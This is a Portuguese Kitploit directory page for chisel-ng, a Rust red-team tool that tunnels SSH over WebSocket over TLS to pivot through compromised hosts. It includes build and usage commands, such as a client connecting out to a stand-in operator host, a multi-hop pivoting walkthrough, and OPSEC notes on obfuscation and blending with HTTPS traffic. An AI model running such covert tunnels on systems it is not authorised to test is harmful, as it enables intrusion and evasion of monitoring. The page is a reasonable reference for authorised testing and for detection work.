Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
chisel-ng — Nova geração do Chisel, escrito em Rust. SSH sobre WSS com algumas personalizações. | Kitploit
Ferramentas/GitHubGitHub/nullsection/chisel-ng
Evasão de IDS/IPSMovimento LateralPós-ExploraçãoSegurança de RedeTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubnullsection/chisel-ng

chisel-ng

Nova geração do Chisel, escrito em Rust. SSH sobre WSS com algumas personalizações.

Ver Repositório
13696há 7 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
root@kitploit:~
       _     _          _
   ___| |__ (_)___  ___| |      _ __   __ _
  / __| '_ \| / __|/ _ \ |_____| '_ \ / _` |
 | (__| | | | \__ \  __/ |_____| | | | (_| |
  \___|_| |_|_|___/\___|_|     |_| |_|\__, |
                                      |___/

chisel-ng

Rust License Windows Linux

Uma implementação em Rust do chisel para testes de penetração e operações de equipe vermelha. Estabelece túneis reversos sobre SSH-sobre-WebSocket-sobre-TLS, permitindo que operadores pivotem através de hosts comprometidos enquanto se misturam com tráfego HTTPS normal.


Índice

  • Início Rápido
  • Funcionalidades
  • Arquitetura
  • Referência de Uso
    • Servidor (Operador)
Cliente Reverso (Agente)
  • Cliente Bind (Agente - Modo de Entrada)
  • Comandos CLI
  • Pivoteamento Multi-Salto
  • Detalhes Técnicos
  • Considerações OPSEC
  • Aviso Legal

  • Início Rápido

    Requisitos

    • Rust 1.70+ (rustup.rs)

    Compilar

    root@kitploit:~
    git clone https://github.com/nullsection/chisel-ng
    cd chisel-ng
    cargo build --release
    

    Binários gerados em target/release/: chisel-server, chisel-client, chisel-bind-client

    Uso Básico

    1. Iniciar servidor (operador):

    root@kitploit:~
    ./chisel-server -p 'secret' -v
    

    2. Executar cliente (alvo):

    root@kitploit:~
    ./chisel-client -s operator.example.com:8443 -p 'secret' -k
    

    3. Criar túneis:

    root@kitploit:~
    chisel-ng> session 1
    [session-1] TARGET > tunnel 8080:192.168.1.100:80
    [session-1] TARGET > socks5 1080
    

    4. Aceder a serviços internos:

    root@kitploit:~
    curl http://127.0.0.1:8080
    curl --socks5 127.0.0.1:1080 http://internal.corp/
    

    Funcionalidades

    • SSH sobre WebSocket sobre TLS - Mistura-se com tráfego HTTPS normal
    • Autenticação por chave pré-compartilhada - Autenticação simples e segura
    • Redirecionamento de portas dinâmico - Cria túneis sob demanda
    • Proxy SOCKS5 - Roteamento dinâmico através de agentes
    • Dois modos de cliente - Reverso (conecta-se para fora) e bind (aceita conexões de entrada)
    • Multiplataforma - Windows e Linux

    Arquitetura

    root@kitploit:~
    +------------------+              +----------------------------------+
    |     Operador     |              |         Rede Alvo                |
    |                  |              |                                  |
    | +--------------+ |     SSH      | +--------------+                 |
    | |chisel-server |<---------------+-|chisel-client |                 |
    | |    :8443     | |   (sobre TLS)| |  (reverso)   |                 |
    | +--------------+ |              | +--------------+                 |
    +------------------+              +----------------------------------+
    

    Pilha de Protocolos:

    root@kitploit:~
    TCP -> TLS 1.3 -> WebSocket -> SSH -> Dados do Túnel
                         ^
                aparece como HTTPS
    

    Modos de Cliente:

    • Reverso (chisel-client) - Conecta-se externamente ao servidor
    • Bind (chisel-bind-client) - Escuta por conexões de entrada; o servidor utiliza o comando connect

    Referência de Uso

    Servidor (Operador)
    root@kitploit:~
    OPÇÕES:
        -l, --listen <ADDR>      Endereço de escuta [padrão: 0.0.0.0:8443]
        -p, --psk <PSK>          Chave pré-compartilhada ou senha [env: CHISEL_PSK]
            --cert <FILE>        Certificado TLS (PEM)
            --key <FILE>         Chave privada TLS (PEM)
            --generate-psk       Gerar PSK aleatório e sair
        -v, --verbose            Saída detalhada
    
    Cliente Reverso (Agente)
    root@kitploit:~
    OPÇÕES:
        -s, --server <ADDR>      Endereço do servidor (host:porta)
        -p, --psk <PSK>          Chave pré-compartilhada ou senha [env: CHISEL_PSK]
        -u, --user <LABEL>       Rótulo da sessão [padrão: agent]
        -k, --insecure           Ignorar verificação TLS
            --no-reconnect       Desativar reconexão automática
        -i, --interval <SEG>     Intervalo de reconexão [padrão: 30]
            --heartbeat <SEG>    Intervalo de heartbeat [padrão: 30]
        -v, --verbose            Saída detalhada
    
    Cliente Bind (Agente - Modo de Entrada)

    Para alvos que podem aceitar conexões de entrada mas não podem iniciar saídas:

    root@kitploit:~
    OPÇÕES:
        -l, --listen <ADDR>      Endereço de escuta (ex.: 0.0.0.0:9000)
        -p, --psk <PSK>          Chave pré-compartilhada ou senha [env: CHISEL_PSK]
        -u, --user <LABEL>       Rótulo da sessão [padrão: agent]
        -k, --insecure           Ignorar verificação TLS
            --heartbeat <SEG>    Intervalo de heartbeat [padrão: 30]
        -v, --verbose            Saída detalhada
    
    Comandos CLI do Servidor

    Menu Principal:

    root@kitploit:~
    sessions             Listar sessões conectadas
    session <id>         Selecionar uma sessão
    connect <ip:porta>   Conectar ao cliente bind
    disconnect <id>      Desconectar sessão (irá reconectar)
    kill <id>            Encerrar processo do cliente
    

    Menu da Sessão:

    root@kitploit:~
    tunnel <local>:<ip_alvo>:<porta_alvo>          Criar túnel
    tunnel --local <local>:<alvo>:<porta>          Criar túnel (apenas localhost)
    tunnel stop <porta>                            Parar túnel
    tunnels                                         Listar túneis
    socks5 <porta>                                 Iniciar proxy SOCKS5
    socks5 stop <porta>                            Parar proxy SOCKS5
    ping                                            Medir latência
    ps                                              Listar processos remotos
    netstat                                         Listar conexões remotas
    

    Pivoteamento Multi-Salto

    Alcance redes isoladas encadeando através de sessões existentes.

    Cenário: O host DMZ pode alcançar o operador. O host interno (10.0.0.50) só pode ser alcançado a partir da DMZ.

    root@kitploit:~
    +----------+        +-----------+        +------------+
    | Operador |--SSH---| Sessão 1 |--TCP---| Sessão 2  |
    | Servidor |        |   (DMZ)   |        | (INTERNO) |
    +----------+        +-----------+        +------------+
    

    Passo 1 - Iniciar servidor (operador):

    root@kitploit:~
    ./chisel-server -p 'secret' -v
    

    Passo 2 - Executar cliente reverso (host DMZ):

    root@kitploit:~
    ./chisel-client -s operator.example.com:8443 -p 'secret' -k
    

    Passo 3 - Executar cliente bind (host interno em 10.0.0.50):

    root@kitploit:~
    ./chisel-bind-client -l 0.0.0.0:9000 -p 'secret' -k
    

    Passo 4 - Criar túnel e conectar (CLI do servidor):

    root@kitploit:~
    chisel-ng> session 1
    [session-1] DMZ > tunnel --local 9000:10.0.0.50:9000
    Tunnel started on 127.0.0.1:9000
    
    [session-1] DMZ > back
    chisel-ng> connect 127.0.0.1:9000
    Session 2 registered
    
    chisel-ng> session 2
    [session-2] INTERNAL > socks5 1080
    

    Detalhes Técnicos

    Como os Túneis Funcionam

    Ao criar um túnel (tunnel 8080:192.168.1.100:80):

    1. O servidor vincula a porta local 8080
    2. Ao conectar, o servidor envia um pedido CONNECT ao agente
    3. O agente conecta-se ao destino e abre um canal SSH direct-tcpip
    4. Os dados são encaminhados bidireccionalmente
    Como o SOCKS5 Funciona

    Destinos dinâmicos através do handshake RFC 1928. Devolve códigos de erro adequados para resultados precisos de scan de portas.


    Considerações OPSEC

    Reforço Binário

    As compilações de release são reforçadas:

    • Operação silenciosa - Todas as mensagens de registo são compiladas como no-ops
    • Ofuscação de strings - Strings de protocolo encriptadas com XOR em tempo de compilação
    • Remoção de símbolos - Nenhum símbolo de depuração ou caminhos de origem
    • Otimização de tamanho - ~3 MB contra ~15 MB em debug
    • Comportamento de pânico - Aborto imediato, sem stack traces
    Segurança Operacional
    • Autenticação PSK - Chave de 256 bits a partir de senha (SHA-256) ou hex bruto
    • Sem armazenamento de credenciais - PSK apenas via argumento ou variável de ambiente
    • Reconexão automática - Activada por defeito, intervalo configurável
    • Heartbeat - Keepalive configurável, desativar com --heartbeat 0
    Vetores de Deteção
    • Impressão digital TLS JA3/JA4
    • Padrões de upgrade WebSocket
    • Duração prolongada da conexão
    • Intervalos de heartbeat consistentes

    Aviso Legal

    Esta ferramenta destina-se apenas a testes de segurança autorizados. Obtenha a devida autorização antes de utilizar. Os autores não são responsáveis por uso indevido.


    Licença

    MIT

    Baixar ferramenta